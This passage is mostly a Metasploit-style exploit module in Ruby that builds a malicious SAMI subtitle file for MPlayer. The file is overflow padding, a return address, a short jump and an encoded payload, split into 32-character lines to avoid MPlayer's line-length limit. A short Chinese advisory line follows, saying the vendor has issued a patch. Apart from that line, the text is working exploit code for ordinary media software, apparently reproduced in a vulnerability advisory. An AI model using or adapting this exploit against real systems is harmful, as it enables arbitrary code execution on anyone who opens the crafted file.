register_options(
[
OptString.new('FILENAME', [ false, 'The file name.', 'msf.smi']),
], self.class)
end
# Split the subtitle to avoid mplayer complaining
# about the line max length
def sami_encode(s)
r = ""
i = 0
while i < s.length
r << s[i, 32]
r << "\n"
i += 32
end
r
end
def exploit
sploit = rand_text(target['Offset'])
sploit << [target.ret].pack("V")
sploit << "\xeb\x06" # jmp short 0x8
sploit << rand_text(2)
sploit << [target['WritableAddress']].pack("V")
sploit << payload.encoded
sami = "<SAMI>\n"
sami << "<BODY>\n"
sami << "<SYNC Start=100550>\n"
sami << sami_encode(sploit)
sami << "</SYNC>\n"
sami << "</BODY>\n"
sami << "</SAMI>\n"
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(sami)
end
end
建议:
--------------------------------------------------------------------------------
厂商补丁:
MPlayer
-------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: